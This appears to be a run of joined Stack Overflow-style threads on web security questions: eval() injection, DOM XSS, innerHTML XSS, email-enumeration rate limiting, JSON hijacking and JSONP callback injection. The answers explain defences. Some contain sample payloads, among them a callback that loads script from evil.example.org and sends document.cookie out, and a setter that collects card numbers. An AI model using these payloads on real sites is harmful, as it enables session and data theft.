I was just researching, why using eval() function is bad and I found one reason to be vulnerable for code injection attacks (Post : Why is using the JavaScript eval function a bad idea?).
But my question is, do we necessarily need to be worried about the code injection in javascript? Because, if any user want to run any JS script for a website, he can do it by running in console.
So, I'm just wondering, what extra harm it may do, if anyone is successful to inject his code in my javascript code?
EDIT
Based on Oleander's answer below, I found one way of vulnerability when we have communications between the browser and the server through AJAX calls. That makes perfect sense. But I may have Javascript programs which only run in the browser and do not have any communications to the backend, for example a Calculator or a Simple Game. So my supplementary question here, is there any other reason which can make these programs vulnerable too?
Security problems occur when a hacker injects harmfull code into a JSON request made by a user, which is then evaluated using eval.
Imagine the following code is being ran
$.get("/get.json", function(data){
var obj = eval(data) // String to javascript object
});
The resource looks like this
GET /get.json
{
some: "data"
}
But an attacker replaces the above with using a man in the middle attack
function(){
// send window.cookie to attacker
}();
The attacker now have access to the users session.
Well if your code takes a value from the query string and uses it in an eval, an attacker could entice their victim to visit the URL containing the evil query string.
From OWASP:
<script>
function loadObj(){
var cc=eval('('+aMess+')');
document.getElementById('mess').textContent=cc.message;
}
if(window.location.hash.indexOf('message')==-1)
var aMess="({\"message\":\"Hello User!\"})";
else
var aMess=location.hash.substr(window.location.hash.indexOf('message=')+8);
</script>
The attacker could send an email containing a link or redirect a user visiting their malicious site to the URL
http://example.com/page.html?message=<img onerror="alert(xss)">
Then you have a DOM based XSS attack.
If your game with no backend is on a site with other sensitive information on it, such as user sessions, then it might be possible for the attacker to steal session cookies or grab credentials. It all depends on what the JavaScript has access to. That is, it will have full access to its hosting domain because the Same Origin Policy will restrict it to that. However, if you have other sensitive applications here then they could be compromised. If not, then at worst the attacker could abuse the trust a user has in your site by altering content or monitoring what users do on your site.
Related
Getting cross site scripting (XSS) issue in javascript file in veracode scan report.
It seems the issue is with innerHtml?
{
var b = document.createElement("div");
b.innerHTML = g.responseText;
for(var d=null,b=b.childNodes,e=0,h=b.length;e<h;++e)
{
var p=b[e];
);
In general, using innerHTML should be avoided unless you know exactly what you're doing.
I'm unfamiliar with Veracode, but I'd wager it's noticing that you're making a fetch request, then inserting data from the response directly into your page as code. It's sounding the alarm about this, as it should. Inserting XHR content directly as HTML is dangerous, as it could allow a malicious actor to execute code on your page in any of the following hypothetical scenarios:
You don't control the endpoint you're querying.Always assume that third-party data is malicious and act to secure your site accordingly.
You control the endpoint, but it becomes compromised.Envision the worst-case scenario, where a hacker breaks in and modifies the data you send to the client.
The endpoint returns unsanitized user input.A user could name themselves <script>alert(1);</script> and cause an alert to appear.
In any of these cases, it's possible for someone to insert a script or other content into a response, which, because you're using innerHTML, will be executed as HTML in the context of the page. This is a textbook example of an XSS (cross-site scripting) vulnerability. Hackers can (and very often do) use exploits like this for malicious purposes, including stealing the passwords, session cookies, and payment information of your end users. You're being warned in your code because hackers could potentially do the same thing to you.
If you're returning HTML code from your endpoint, firstly, don't. Return the data you want to put inside the elements in JSON format, then construct the elements yourself on the client side using document.createElement and Node.textContent. This will ensure that the data you return isn't interpreted as HTML code.
If you're retrieving static, non-HTML data from the endpoint, then you don't even need a workaround-- just switch innerHTML to textContent and you'll be on your way.
Imagine the next scenario: a user wants to register to a webpage and fills a form. While he is filling the form, jQuery keeps checking through a regular expression if fields are valid, etc...
Taking the email as the primary key which the user will use after registering to login, the email field needs to be checked with Ajax to let the user know if that email is registered or not. I want to check it with Ajax to avoid sending the full form and emptying it, refreshing page, etc...
So, when the user has ended filling the email field, the Ajax request is sent to the server, something like the next link:
example.com/check.php?email=abcdefg#gmail.com
When check.php receives the email, it asks the database if it exists or not and returns a message like: User already exists if user exists or null if user does not exist.
The question is: if someone digs through my .js and finds out links similar to that, they could use that link to send a large number of requests to find out if those random emails exist. This could lead to heavy use of the database or in the worst cases even crashing and private information leaks.
Someone could do a huge for loop to check emails like:
//Getting the response of the next links
example.com/check.php?email=aaaaaaa#gmail.com // Returns null
example.com/check.php?email=aaaaaab#gmail.com // Returns null
example.com/check.php?email=aaaaaac#gmail.com // Returns null
example.com/check.php?email=aaaaaad#gmail.com // Returns User already exists
------------------------------------------------------------------------------------------------------------------------------------
Since i last accepted the answer, i kept investigating this and found the solution to avoid this behaviour. The following code is for JAVA but the logic can be applied to any other server-side language.
Before doing ANY ajax request to the server, I request a token to the server. This token looks like this fmf5p81m6e56n4va3nkfu2ns8n it is made by a simple method, it can, however, be more complex, but this is good to go.
public String getToken() throws UnsupportedEncodingException {
return new BigInteger(130, new SecureRandom()).toString(32);
}
When requesting the token, the server does not only return the token, but also a small script that in case someone uses browser to inspect element (and browser navbar) and such the script will run and the token will be cleared. Servlet returns something like this:
_html += "<head>"
+ "<script> "
+ "window.onload=function(){\n"
+ " document.body.innerHTML = \"\";\n"
+ " }"
+ "window.location.href='http://mywebsite.com' "
+ "</script>"
+ "</head>"
+ "<body>"
+ "[" + token+ "]"
+ "</body>"
+ "</html>";
First empties the body then navigates back to wherever we want. javascript/jquery will however, catch the entire content as string, then I simply extract the string between [ and ]. This token is only available for the next request, so every AJAX request will have its unique token. On the 2nd reques the token just used is deleted.
After I get the token I append it as parameter to whatever link i request, something like this:
ajaxRequestObjet = $.ajax({
url: "http://localhost:8084/mywebsite.com/servlet", //<-- local tomcat server
method: "POST",
data: "type=AJAX&page=some-article&token=fmf5p81m6e56n4va3nkfu2ns8n"
});
This method works fine against someone who inspects the website manually and try to use the links, but what about java/php/IIS servers that do this automaticly?
For this ask for header! Something like this:
boolean isAjax = "XMLHttpRequest".equals(request.getHeader("X-Requested-With"));
It will be true only and only if XMLHttpRequest exists....
There is one last thing to keep in mind. Make sure 'Access-Control-Allow-Origin' header is NOT present in your app to make sure that any javascript NOT in your server wont get the server resources. If this header does not exist, chrome will return this:
XMLHttpRequest cannot load http://localhost:8084/mywebsite.com/servlet. No 'Access-Control-Allow-Origin' header is present on the requested resource. Origin 'http://localhost' is therefore not allowed access.
Java server was in tomcat and I had another apache for this tests, this is the small html present in apache which gave the error above:
<html>
<head>
<script src="http://code.jquery.com/jquery-latest.min.js" type="text/javascript"></script>
<script>
ajaxRequestObjet = $.ajax({
url: "http://localhost:8084/mywebsite.com/servlet",
method: "POST",
data: "type=AJAX&page=Token"
});
ajaxRequestObjet.done(function (msg) {
alert(msg);
});
</script>
</head>
<body>
</body>
</html>
While you can not control this 100%... there are a few options..
Try using the same methods that people use with Captcha scripts..
Basically when the user loads the form / page.. You generate a random string/id in their PHP session and store it.. When they send the ajax requests, have your ajax check also append the string/id and require it before allowing a check to perform else return a header of 500 or something..
Using this approach with sessions, you could set a allowed limit of checks (say 5) and once the user has tried more than 5 checks, They are required to reload the page or perform a human check (eg Captcha).. Then it resets their count.. Even allow a total of say 30 within 1 hour / per IP or something.
Also use smart events to trigger when the ajax check is done, eg field/tab change or on a button press.. Or when a valid email is detected.. but say .com.au would trigger twice.
Basically this way, even if someone sniffed your JS files and tried to automate the email checker.. It would require them finding a way to append the string/id that you generate and also limit their amount of requests performed.
Beyond this, there is not to much more you can do easily.. But there are still a few other idea's.
Most of them would work around using a PHP session / cookie.. Say for example if they check and find 3 email addresses.. Then again you set that as a limit and force them to require a manual submission or something.
See how the above suggestion goes for you, any questions do feel free to ask. But may take me a day or two to reply as weekend.. Also research how Captcha scripts work as plenty of source code for them.. As they work on the same idea.
Time Delays will simply look bad / make your site appear slow / bug the user with waiting for a response.
You need to limit the amount of look up's per session / ip address.. Otherwise there is always a way to get past these checks.. Basically once they hit a limit.. Force the user/ip/session to wait a few minutes/hours and verify them with a Captcha script so it can not be scripted...
Javascript Security / Hiding The Source
While you can not do this truly, you can do certain things generate the JS using a PHP page with a JS header.. so <script src='myjscode.php'></script> and this allows PHP to check for a valid session.. So stops external requests to an extent.. But this is mostly useful for allowing JS to be only available behind a membership/login..
Multiple Checks / If Possible In This Case
Depending on your approach, is this for a user to check if they already have an account? If so.. you could combine the email check with something like their name/country/age/dob ... So they would need to select two or three correct matching values before being able to get a check/response from the ajax call?
Maybe not in your case, but just thought would add this as well.
The JavaScript code on your website is executed on the computer of the user, so there is no way you could stop him from digging through your code. Even if you use a code obfuscator (for example, https://www.javascriptobfuscator.com/), the hacker could debug your application and record all requests send to the server.
Everything security-relevant has to happen on the server. You could limit the amount of requests from a specific IP address.
You could protect against brute force attacks with something similar to CSRF tokens:
Assign a server-generated ID to every client session. Each request to check.php should include this ID.
check.php should reject requests that do not include an ID, or include an ID that the server did not generate (to prevent attacks with spoofed IDs). It should also rate limit on ID - if a given ID has made a request in (say) the last second, or a given ID makes more than n requests in a 10 second interval, it should return an error response. This protects against requests from a single session arriving from several IP addresses.
You should also rate limit by IP address to prevent brute-forcing by opening a large number of web application sessions.
There isn't much you can do to prevent an attacker looking up a single, or small number, of specific email addresses - it's an inherent risk with this type of validation.
One approach to resolve this problem could be this:
Suppose you have ajax request calling your server to receive a response from a particular user or client. You can have a table in your database where you provide a unique token for every user or hash value that can be checked every time user makes an ajax request to the server. If the token value matches the user request value than he is a genuine user. You can also record his number of request on the table to ensure he is making legitimate requests. I acknowledge the fact that it may slow down your app performance, but it will be safe option to consider. Note: you need to retrieve the token on your HTML page to send it with ajax.
Please comment to know more. I have been using this approach and there is no problem until now.
Example:
This type of attack can be treated the same as any other brute force attack, where the only effective solution is to use a Captcha. But of course, Captchas are a detriment to UX, so you have to consider if the additional security is worth it, especially for an attack that is very unlikely to happen anyway. That said, you may want to use a Captcha on your registration form anyway, to prevent bots from creating accounts.
This sort of attack has a huge cost for little reward for the attacker. There are billions of possible email addresses to test for. It could only be worth going to great lengths such as this, if the site in question was particularly sensitive, such as some kind of adult site, where the attacker hopes to blackmail users that he finds.
CloudFlare
Not as good as a Captcha solution but the brute force attack might be detected and prevented by CloudFlare's DDoS system. Also, CF can force Tor users to solve a Captcha before accessing your site, which would prevent an attacker from using Tor as a vehicle for the attack.
IP Rate Limiting
Rate limiting on an IP basis has problems because if an attacker decided to undertake a task as huge as this, he will likely be using a Botnet or some other system of multiple machines to launch the attack.
Consider a large organisation such as a University, where all users share the public IP. One of the users launches an attack on your site, and you block his IP, and in the processes blocking everyone else. This countermeasure could actually be used to launch a DoS attack.
Session ID/CRSF Token
Definitely not a solution because the attacker needs to simply make a request to the page first, to obtain the token. It's an additional request to make but only an inconvenience for the attacker.
First of all: I'd URL-encode the mail-address. 'example.com/check.php?email=' . urlencode(abcdefg#gmail.com)
Ad your question: when check.php is called, you can
check, if the user's session and his IP have sent a request during the last seconds
if not, write the user's session, the user's IP plus the current timestamp to a helper-table plus to a cookie and hit your DB
if yes, block the request
But I'm afraid this won't help you from fraud because everyone can check your JavaScript and if someone want's to exploit this, he will find ways.
check.php should depending on the setup either only be accessible internally, or verify from where the connection is made. Take a look at this previous question- I hope it might be what you're looking for. how to verify the requesting server in php?
You could use a CSRF token and exit early from your script if you detect that no or an invalid CSRF token. Almost (if not all) PHP frameworks come with support for this.
Also check this question from the security community: https://security.stackexchange.com/questions/23371/csrf-protection-with-custom-headers-and-without-validating-token
Using PHP, how do you securely authenticate an API call, cross-domain, with the following criteria:
Must be called from a given domain.com/page (no other domain)
must have a given key
Some background: Please read carefully before answering...
My web application will display a javascript widget on a client's website via a call like the one below. So we're talking about cross-domain authentication for a script to be served but only to genuine client and for a given URL only!
At the moment the widget can be included by the CLIENT's website, by a single-line of javascript.
Example client-website.com/page/with/my-widget
<head>
...
<script src="//ws.my-webappserver.com/little-widget/?key=api_key"></script>
...
</head>
Now, in reality this does not call javascript directly but a PHP script on my remote server which sits in front of the actual javascript for the purpose of doing some authentication.
The PHP script behind the above call does this first:
checks that API key ($_REQUEST["key"]) matches the user's record in the database.
checks the referrer's URL ($_SERVER['HTTP_REFERER']) against the a record in the database***.
This is simplified, but in essence the server looks like:
if ($_SERVER['HTTP_REFERER'] !== "http://client-website.com/page/with/my-widget")
&& $_REQUEST["Key"] == "the_long_api_key") {
header("Content-type: application/x-javascript");
echo file_get_contents($thewidgetJS_in_secret_location_on_server);
} else {
//pretend to be a 404 page not found or some funky thing like that
}
***The widget is only allowed to run on CERTAIN websites/pages
Now, here's the problem:
the key is on the client side so anyone can view source and get the key
referrers can be spoofed (by cURL) for example
And a little snag:
I can't tell the clients to stick the key inside a php script on their server because they could be running any server side language!
So how can I make my web service secure and only accessible by a given domain/page?
Any help would be really appreciated!
ps: The widget does some uploading to a kind of drop box - so security is key here!
id recommend using a whitelist approach to this issue, i am not entirely sure this will solve the problem however i have used a similar technique for a payment processor which requires you to whitelist server-ips.
After reading the famous (and only) article about trying to explain why asmxs should NOTallow Get requests
so we shouldn't use : [ScriptMethod(UseHttpGet = true)] , I still I have a question :
Why ?
Web service , as its name is a service , he doesn't suppose to care if it's GET or POST :
Even if a person do a CSRF : like embedding in his malicious site :
<script type="text/javascript" src="http://contoso.com/StockService/Stock.asmx/GetQuotes?symbol=msft" />
so what ?
Via asmx POV - it is just a normal request.
Can someone please spot for me the problem with example ?
edit
there are many problems solved with new browsers.
this link shows some other methods which should be tested in new browsers.
JSON hijacking is briefly explained in this article.
Let's suppose that you have a web service that returns a list of credit card numbers to the currently authenticated user:
[{"id":"1001","ccnum":"4111111111111111","balance":"2345.15"},
{"id":"1002","ccnum":"5555555555554444","balance":"10345.00"},
{"id":"1003","ccnum":"5105105105105100","balance":"6250.50"}]
Here's how the attack could be performed:
Get an authenticated user to visit a malicious page.
The malicious page will try and access sensitive data from the application that the user is logged into. This can be done by embedding a script tag in an HTML page since the same-origin policy does not apply to script tags. <script src="http://<json site>/json_server.php"></script>. The browser will make a GET request to json_server.php and any authentication cookies of the user will be sent along with the request.
At this point while the malicious site has executed the script it does not have access to any sensitive data. Getting access to the data can be achieved by using an object prototype setter. In the code below an object prototypes property is being bound to the defined function when an attempt is being made to set the "ccnum" property.
Object.prototype.__defineSetter__('ccnum',function(obj) {
secrets = secrets.concat(" ", obj);
});
At this point the malicious site has successfully hijacked the sensitive financial data (ccnum) returned by json_server.php.
There are also other forms of JSON hijacking techniques which do not rely on the browser support for the __defineSetter__ function. That's just one way to conduct the attack but there are many others as described in this article such as Array constructor clobbering, UTF-7, ES5 functionality.
For this reason, GET requests returning JSON are disabled by default in ASP.NET.
Well if you follow the article that is then linked in the one you provided which can be found here: http://ajax.asp.net/docs/overview/AsynchronousLayerOverview.aspx, you can then read on and the only reason it specifically specifies is this:
GET requests are not recommended for method calls that modify data on
the server or that expose critical information. In GET requests, the
message is encoded by the browser into the URL and is therefore an
easier target for tampering. For both GET and POST requests, you
should follow security guidelines to protect sensitive data.
Some of our customers have chimed in about a perceived XSS vulnerability in all of our JSONP endpoints, but I disagree as to whether or not it actually constitutes a vulnerability. Wanted to get the community's opinion to make sure I'm not missing something.
So, as with any jsonp system, we have an endpoint like:
http://foo.com/jsonp?cb=callback123
where the value of the cb parameter is replayed back in the response:
callback123({"foo":"bar"});
Customers have complained that we don't filter out HTML in the CB parameter, so they'll contrive an example like so:
http://foo.com/jsonp?cb=<body onload="alert('h4x0rd');"/><!--
Obviously for a URL that returns the content type of text/html, this poses a problem wherein the browser renders that HTML and then executes the potentially malicious javascript in the onload handler. Could be used to steal cookies and submit them to the attacker's site, or even to generate a fake login screen for phishing. User checks the domain and sees that it's one he trusts, so he goes agead and logs in.
But, in our case, we're setting the content type header to application/javascript which causes various different behaviors in different browsers. i.e. Firefox just displays the raw text, whereas IE opens up a "save as..." dialog. I don't consider either of those to be particularly exploitable. The Firefox user isn't going to read malicious text telling him to jump off a bridge and think much of it. And the IE user is probably going to be confused by the save as dialog and hit cancel.
I guess I could see a case where the IE user is tricked into saving and opening the .js file, which then goes through the microsoft JScript engine and gets all sorts of access to the user's machine; but that seems unlikely. Is that the biggest threat here or is there some other vulnerability that I missed?
(Obviously I'm going to "fix" by putting in filtering to only accept a valid javascript identifier, with some length limit just-in-case; but I just wanted a dialog about what other threats I might have missed.)
Their injection would have to be something like </script><h1>pwned</h1>
It would be relatively trivial for you to verify that $_GET['callback'] (assuming PHP) is a valid JavaScript function name.
The whole point of JSONP is getting around browser restrictions that try and prevent XSS-type vulnerabilities, so to some level there needs to be trust between the JSONP provider and the requesting site.
HOWEVER, the vulnerability ONLY appears if the client isn't smartly handling user input - if they hardcode all of their JSONP callback names, then there is no potential for a vulnerability.
Your site would have an XSS vulnerability if the name of that callback (the value of "cb") were derived blindly from some other previously-input value. The fact that a user can create a URL manually that sends JavaScript through your JSONP API and back again is no more interesting than the fact that they can run that same JavaScript directly through the browser's JavaScript console.
Now, if your site were to ship back some JSON content to that callback which used unfiltered user input from the form, or more insidiously from some other form that previously stored something in your database, then you'd have a problem. Like, if you had a "Comments" field in your response:
callback123({ "restaurantName": "Dirty Pete's Burgers", "comment": "x"+alert("haxored")+"y" })
then that comment, whose value was x"+alert("haxored")+"y, would be an XSS attack. However any good JSON encoder would fix that by quoting the double-quote characters.
That said, there'd be no harm in ensuring that the callback name is a valid JavaScript identifier. There's really not much else you can do anyway, since by definition your public JSONP service, in order to work properly, is supposed to do whatever the client page wants it to do.
Another example would be making two requests like these:
https://example.org/api.php
?callback=$.getScript('//evil.example.org/x.js');var dontcare=(
which would call:
$.getScript('//evil.example.org/x.js');var dontcare= ({ ... });
And evil.example.org/x.js would request:
https://example.org/api.php
?callback=new Mothership({cookie:document.cookie, loc: window.location, apidata:
which would call:
new Mothership({cookie:document.cookie, loc: window.location, apidata: { .. });
Possibilities are endless.
See Do I need to sanitize the callback parameter from a JSONP call? for an example of sanitizing a JSON callback.
Note: Internet Explorer tends to ignore the Content-Type header by default. It is stubborn, and goes to look at the first few bytes of the HTTP response directly, and if it looks kinda of HTML, it will proceed to parse and execute it all as text/html, including inline scripts.
There's nothing to stop them from doing something that inserts code, if that is the case.
Imagine a URL such as http://example.com/jsonp?cb=HTMLFormElement.prototype.submit = function() { /* send form data to some third-party server */ };foo. When this gets received by the client, depending on how you handle JSONP, you may introduce the ability to run JS of arbitrary complexity.
As for how this is an attack vector: imagine an HTTP proxy, that is a transparent forwarding proxy for all URLs except http://example.com/jsonp, where it takes the cb part of the query string and prepends some malicious JS before it, and redirects to that URL.
As Pointy indicates, solely calling the URL directly is not exploitable. However, if any of your own javascript code makes calls to the JSON service with user-supplied data and either renders the values in the response to the document, or eval()s the response (whether now, or sometime in the future as your app evolves over time) then you have a genuinely exploitable XSS vulnerability.
Personally I would still consider this a low risk vulnerability, even though it may not be exploitable today. Why not address it now and remove the risk of it being partly responsible for introducing a higher-risk vulnerability at some point in the future?